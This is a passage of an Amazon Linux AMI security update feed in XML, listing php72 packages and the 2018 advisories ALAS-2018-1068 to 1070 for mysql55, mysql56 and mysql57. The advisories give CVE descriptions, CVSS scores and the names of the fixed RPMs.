arch="i686"><filename>Packages/php72-dba-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.8-1.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1068</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1068: medium priority package update for mysql55</title><issued date="2018-08-22 19:33:00" /><updated date="2018-08-23 17:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-3081:
Vulnerability in the MySQL Client component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior, 5.7.22 and prior and 8.0.11 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Client. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Client as well as unauthorized update, insert or delete access to some of MySQL Client accessible data. CVSS 3.0 Base Score 5.0 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H).
1602424:
CVE-2018-3081 mysql: Client programs unspecified vulnerability (CPU Jul 2018)
CVE-2018-3070:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client mysqldump). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1602369:
CVE-2018-3070 mysql: Client mysqldump unspecified vulnerability (CPU Jul 2018)
CVE-2018-3066:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Options). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data as well as unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 3.3 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N).
1602366:
CVE-2018-3066 mysql: Server: Options unspecified vulnerability (CPU Jul 2018)
CVE-2018-3063:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 5.5.60 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1602363:
CVE-2018-3063 mysql: Server: Security: Privileges unspecified vulnerability (CPU Jul 2018)
CVE-2018-3058:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: MyISAM). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N).
1602356:
CVE-2018-3058 mysql: MyISAM unspecified vulnerability (CPU Jul 2018)
CVE-2018-2767:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Encryption). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N).
1564965:
CVE-2018-2767 mysql: use of SSL/TLS not enforced in libmysqld (Return of BACKRONYM)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2767" title="" id="CVE-2018-2767" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3058" title="" id="CVE-2018-3058" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3063" title="" id="CVE-2018-3063" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3066" title="" id="CVE-2018-3066" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3070" title="" id="CVE-2018-3070" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3081" title="" id="CVE-2018-3081" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql55-embedded-devel" version="5.5.61" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.61-1.22.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.61" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.61-1.22.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.61" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.61-1.22.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.61" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.61-1.22.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.61" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.61-1.22.amzn1.x86_64.rpm</filename></package><package name="mysql-config" version="5.5.61" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-config-5.5.61-1.22.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.61" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.61-1.22.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.61" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.61-1.22.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.61" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.61-1.22.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.61" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.61-1.22.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.61" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.61-1.22.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.61" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.61-1.22.amzn1.i686.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.61" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.61-1.22.amzn1.i686.rpm</filename></package><package name="mysql-config" version="5.5.61" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-config-5.5.61-1.22.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.61" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.61-1.22.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.61" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.61-1.22.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.61" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.61-1.22.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.61" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.61-1.22.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.61" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.61-1.22.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.61" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.61-1.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1069</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1069: medium priority package update for mysql56</title><issued date="2018-08-22 19:34:00" /><updated date="2018-08-23 17:59:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-3081:
Vulnerability in the MySQL Client component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior, 5.7.22 and prior and 8.0.11 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Client. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Client as well as unauthorized update, insert or delete access to some of MySQL Client accessible data. CVSS 3.0 Base Score 5.0 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H).
1602424:
CVE-2018-3081 mysql: Client programs unspecified vulnerability (CPU Jul 2018)
CVE-2018-3070:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client mysqldump). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1602369:
CVE-2018-3070 mysql: Client mysqldump unspecified vulnerability (CPU Jul 2018)
CVE-2018-3066:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Options). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data as well as unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 3.3 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N).
1602366:
CVE-2018-3066 mysql: Server: Options unspecified vulnerability (CPU Jul 2018)
CVE-2018-3064:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.40 and prior, 5.7.22 and prior and 8.0.11 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 7.1 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H).
1602364:
CVE-2018-3064 mysql: InnoDB unspecified vulnerability (CPU Jul 2018)
CVE-2018-3062:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Memcached). Supported versions that are affected are 5.6.40 and prior, 5.7.22 and prior and 8.0.11 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via memcached to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H).
1602360:
CVE-2018-3062 mysql: Server: Memcached unspecified vulnerability (CPU Jul 2018)
CVE-2018-3058:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: MyISAM). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N).
1602356:
CVE-2018-3058 mysql: MyISAM unspecified vulnerability (CPU Jul 2018)
CVE-2018-2767:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Encryption). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N).
1564965:
CVE-2018-2767 mysql: use of SSL/TLS not enforced in libmysqld (Return of BACKRONYM)
CVE-2018-0739:
Constructed ASN.1 types with a recursive definition (such as can be found in PKCS7) could eventually exceed the stack given malicious input with excessive recursion. This could result in a Denial Of Service attack. There are no such structures used within SSL/TLS that come from untrusted sources so this is considered safe. Fixed in OpenSSL 1.1.0h (Affected 1.1.0-1.1.0g). Fixed in OpenSSL 1.0.2o (Affected 1.0.2b-1.0.2n).
1561266:
CVE-2018-0739 openssl: Handling of crafted recursive ASN.1 structures can cause a stack overflow and resulting denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0739" title="" id="CVE-2018-0739" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2767" title="" id="CVE-2018-2767" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3058" title="" id="CVE-2018-3058" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3062" title="" id="CVE-2018-3062" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3064" title="" id="CVE-2018-3064" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3066" title="" id="CVE-2018-3066" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3070" title="" id="CVE-2018-3070" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3081" title="" id="CVE-2018-3081" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56" version="5.6.41" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.41-1.30.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.41" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.41-1.30.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.41" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.41-1.30.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.41" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.41-1.30.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.41" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.41-1.30.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.41" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.41-1.30.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.41" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.41-1.30.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.41" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.41-1.30.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.41" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.41-1.30.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.41" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.41-1.30.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.41" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.41-1.30.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.41" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.41-1.30.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.41" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.41-1.30.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.41" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.41-1.30.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.41" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.41-1.30.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.41" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.41-1.30.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.41" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.41-1.30.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.41" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.41-1.30.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.41" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.41-1.30.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.41" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.41-1.30.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.41" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.41-1.30.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.41" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.41-1.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1070</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1070: medium priority package update for mysql57</title><issued date="2018-08-22 19:35:00" /><updated date="2018-08-23 18:26:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-3081:
Vulnerability in the MySQL Client component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior, 5.7.22 and prior and 8.0.11 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Client. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Client as well as unauthorized update, insert or delete access to some of MySQL Client accessible data. CVSS 3.0 Base Score 5.0 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H).
1602424:
CVE-2018-3081 mysql: Client programs unspecified vulnerability (CPU Jul 2018)
CVE-2018-3077:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.7.22 and prior and 8.0.11 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1602375:
CVE-2018-3077 mysql: Server: DDL unspecified vulnerability (CPU Jul 2018)
CVE-2018-3071:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Audit Log). Supported versions that are affected are 5.7.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1602370:
CVE-2018-3071 mysql: Audit Log unspecified vulnerability (CPU Jul 2018)
CVE-2018-3070:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client mysqldump). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1602369:
CVE-2018-3070 mysql: Client mysqldump unspecified vulnerability (CPU Jul 2018)
CVE-2018-3066:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Options). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data as well as unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 3.3 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N).
1602366:
CVE-2018-3066 mysql: Server: Options unspecified vulnerability (CPU Jul 2018)
CVE-2018-3065:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.7.22 and prior and 8.0.11 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1602365:
CVE-2018-3065 mysql: Server: DML unspecified vulnerability (CPU Jul 2018)
CVE-2018-3064:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.40 and prior, 5.7.22 and prior and 8.0.11 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 7.1 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H).
1602364:
CVE-2018-3064 mysql: InnoDB unspecified vulnerability (CPU Jul 2018)
CVE-2018-3062:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Memcached). Supported versions that are affected are 5.6.40 and prior, 5.7.22 and prior and 8.0.11 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via memcached to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H).
1602360:
CVE-2018-3062 mysql: Server: Memcached unspecified vulnerability (CPU Jul 2018)
CVE-2018-3061:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.7.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1602359:
CVE-2018-3061 mysql: Server: DML unspecified vulnerability (CPU Jul 2018)
CVE-2018-3060:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.22 and prior and 8.0.11 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all MySQL Server accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H).
1602357:
CVE-2018-3060 mysql: InnoDB unspecified vulnerability (CPU Jul 2018)
CVE-2018-3058:
